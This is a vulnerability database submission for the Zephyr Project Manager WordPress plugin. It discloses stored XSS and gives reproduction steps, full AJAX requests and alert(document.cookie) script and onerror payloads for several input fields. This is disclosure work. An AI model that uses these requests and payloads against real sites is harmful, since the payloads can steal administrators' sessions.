Soumettre #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSSinformation

TitreZephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS
DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. > It has been determined that in most places throughout the application, the data from the input field can be injected as html without any sanitization and validation. The details of the discovery are given below. ## Proof of Concept (PoC) The details of the various (Reflexted and Stored) XSS on the application are given below. ### Endpoint Of New Discussion For Task. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 2. Click on Discussion tab. 3. Fill in payload in the comment field. 4. Click on "Comment". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 108 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7 Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : message ### Endpoint Of New Team and Team Update. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "New Team" or "Edit Team". 3. Fill in payload in the team name and team description field. 4. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : name,description ### Endpoint Of User Access (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "Bulk Edit Access". 3. Choose any options. 4. Click on "Allow Access". 5. "access" parameter is intervened by proxy. 6. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1103 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : access
La source⚠️ https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed
Utilisateur
 r1z4x (UID 31999)
Soumission13/09/2022 14:39 (il y a 4 ans)
Modérer23/09/2022 08:58 (10 days later)
StatutAccepté
Entrée VulDB209370 [Zephyr Project Manager jusqu’à 3.2.4 sur WordPress REST Call /v1/tasks/create/ onanimationstart cross site scripting]
Points20

PrécédentAperçuSuivant

Do you know our Splunk app?

Download it now for free!